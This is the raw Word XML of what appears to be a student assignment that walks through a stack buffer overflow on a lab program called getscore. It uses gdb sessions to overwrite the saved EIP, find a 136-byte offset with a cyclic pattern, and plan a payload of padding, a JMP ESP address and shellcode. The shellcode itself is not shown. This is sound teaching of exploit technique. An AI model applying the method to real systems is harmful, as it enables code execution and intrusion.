    <w:p w:rsidR="00F41E37" w:rsidRPr="00F41E37" w:rsidRDefault="00F41E37" w:rsidP="00F41E37">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t>With the breakpoint set, we can continue debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7985" w:rsidRPr="008F7985" w:rsidRDefault="008F7985" w:rsidP="00F41E37">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008F7985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(gdb) continue</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Continuing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7985" w:rsidRPr="00F41E37" w:rsidRDefault="00F41E37" w:rsidP="00F41E37">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t>And examine the new stack frame, once the string</w:t>
      </w:r>
      <w:r w:rsidR="00A8555F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> of A’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="00A8555F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t>in the function environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7985" w:rsidRPr="008F7985" w:rsidRDefault="008F7985" w:rsidP="00F41E37">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008F7985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Breakpoint 2, 0x0804887f in get_score ()</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(gdb) info frame</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Stack level 0, frame at 0xbffff358:</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 xml:space="preserve"> eip = 0x804887f in get_score; saved eip </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8555F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0x41414141</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 xml:space="preserve"> Arglist at 0xbffff358, args:</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 xml:space="preserve"> Locals at 0xbffff358, Previous frame's sp in esp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7985" w:rsidRP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 xml:space="preserve"> Saved registers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7985" w:rsidRDefault="008F7985" w:rsidP="008F7985">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008F7985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  ebp at 0xbffff358, eip at 0xbffff35c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8555F" w:rsidRPr="00560ACE" w:rsidRDefault="00A8555F" w:rsidP="00560ACE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00560ACE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">The saved eip has been overwritten by </w:t>
      </w:r>
      <w:r w:rsidR="00560ACE" w:rsidRPr="00560ACE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0x41414141</w:t>
      </w:r>
      <w:r w:rsidR="00560ACE" w:rsidRPr="00560ACE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00560ACE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t>– hex for “AAAA”.</w:t>
      </w:r>
      <w:r w:rsidR="008100C6" w:rsidRPr="00560ACE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> This isn’t particularly useful, aside from acting as a proof of concept. What </w:t>
      </w:r>
      <w:r w:rsidR="008100C6" w:rsidRPr="00560ACE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r w:rsidR="008100C6" w:rsidRPr="00560ACE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> be useful is finding the location of the eip, as an offset from the buffer. Armed with this information, we can determine exactly how long our string of A’s must be before we can enter the address of the JMP ESP instruction, which will be exploited to execute our shell code. To do this, we can use any number of ways in order to find the offset. One possible method is to ‘brute force’ the offset, by manually setting the arguments within the debugger and checking to see when the eip is located. A faster method is to use a tool like Jason Rush’s </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="008100C6" w:rsidRPr="00E02381">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
          </w:rPr>
          <w:t>“Buffer Overflow EIP Offset String Generator.”</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008100C6" w:rsidRPr="00560ACE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> Though </w:t>
      </w:r>
      <w:r w:rsidR="009366ED">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">the name is </w:t>
      </w:r>
      <w:r w:rsidR="008100C6" w:rsidRPr="00560ACE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">quite the mouthful, the tool is rather simple: by inputting a string length – such as 150 – we </w:t>
      </w:r>
      <w:r w:rsidR="002C4FA7" w:rsidRPr="00560ACE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">can create a </w:t>
      </w:r>
      <w:r w:rsidR="002C4FA7" w:rsidRPr="009366ED">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>non</w:t>
      </w:r>
      <w:r w:rsidR="009366ED">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="002C4FA7" w:rsidRPr="009366ED">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>repeating</w:t>
      </w:r>
      <w:r w:rsidR="002C4FA7" w:rsidRPr="00560ACE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009366ED">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">(this part is vital) </w:t>
      </w:r>
      <w:r w:rsidR="002C4FA7" w:rsidRPr="00560ACE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t>string that makes finding the EIP offset trivial.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="00A8555F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t>First, we generate the string and replace the perl command from before with it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="00A8555F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>(gdb) set args “aaa” “</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4FA7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4FA7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Ae6Ae7Ae8Ae9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="00A8555F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="00A8555F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D6C43" w:rsidRDefault="000D6C43" w:rsidP="00A8555F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="00A8555F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Now, we can run the debugger again, repeating the same steps as before to continue past the first breakpoint, but remaining in the stack frame before get_score returns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRPr="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="002C4FA7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002C4FA7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(gdb) run</w:t>
      </w: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The program being debugged has been started already.</w:t>
      </w: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Start it from the beginning? (y or n) y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRPr="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="002C4FA7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRPr="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="002C4FA7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4FA7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Starting program: /root/Exploit/getscore "aaa" "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRPr="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="002C4FA7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pP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Breakpoint 1, 0x08048625 in main ()</w:t>
      </w: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(gdb) continue</w:t>
      </w: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Continuing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRPr="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="002C4FA7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pP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Breakpoin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>t 2, 0x0804887f in get_score ()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="00A8555F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Now, when we examine the stack frame, we no longer see our string of A’s in the EIP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRPr="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="002C4FA7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002C4FA7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(gdb) info frame</w:t>
      </w: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Stack level 0, frame at 0xbfffe8d8:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRPr="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="002C4FA7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4FA7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4FA7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">eip = 0x804887f in get_score; saved eip </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4FA7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0x65413565</w:t>
      </w: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 xml:space="preserve"> Arglist at 0xbfffe8d8, args:</w:t>
      </w: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 xml:space="preserve"> Locals at 0xbfffe8d8, Previous frame's sp in esp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRP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 xml:space="preserve"> Saved registers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="002C4FA7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002C4FA7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  ebp a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>t 0xbfffe8d8, eip at 0xbfffe8dc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4FA7" w:rsidRDefault="002C4FA7" w:rsidP="002C4FA7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead, we can now find a segment of the string we used – </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4FA7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0x65413565</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4FA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t>– a segment that the tool referenced above can use to calculate the offset from the buffer. Pasting it into the website returns an offset of 136 bytes – success!</w:t>
      </w:r>
      <w:r w:rsidR="009366ED">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> An alternative to using this tool is to determine the address of the buffer through a system of trial and error. Once this address has been found, it may be subtracted from the address of EIP to determine the offset. Note: each time the program is run in gdb, these addresses will be randomized – a measure taken to thwart these types of exploits. However, the offset remains constant – an important fact.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F50DB" w:rsidRPr="002C4FA7" w:rsidRDefault="008F50DB" w:rsidP="002C4FA7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we have determined the address of EIP is 136 bytes after the address of the buffer, what next? Well – with the address of EIP, we can ‘tell’ the program the next instruction to execute. By placing the address of a given instruction just after our 136 bytes of A’s – referred to as a NOP sled – the instruction will be executed by the program. To use this to our advantage, we will use the address of the JMP ESP instruction to make the program execute our shell code. </w:t>
      </w:r>
      <w:r w:rsidR="009051F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t>This address must be formatted in Little Endian to ensure proper execution. The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> final exploit will be composed of 136 bytes of characters to overflow the buffer,</w:t>
      </w:r>
      <w:r w:rsidR="009051F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> followed by the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 bytes for the address of the JMP ESP instruction, and finally 46 bytes of shell code which will provide us access to the shell. Refer to the source code for this exploit to see how this all comes together.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008F50DB" w:rsidRPr="002C4FA7" w:rsidSect="005903D7">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C43" w:rsidRDefault="000D6C43" w:rsidP="000D6C43">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000D6C43" w:rsidRDefault="000D6C43" w:rsidP="000D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C43" w:rsidRDefault="000D6C43" w:rsidP="000D6C43">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000D6C43" w:rsidRDefault="000D6C43" w:rsidP="000D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C43" w:rsidRPr="000D6C43" w:rsidRDefault="000D6C43" w:rsidP="000D6C43">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:i/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="000D6C43">
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t>Matthew Kramer – Assignment 1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349C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12B4D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C4"/>
    <w:rsid w:val="000D6C43"/>
    <w:rsid w:val="002A4C42"/>
    <w:rsid w:val="002C4FA7"/>
    <w:rsid w:val="0033762E"/>
    <w:rsid w:val="00560ACE"/>
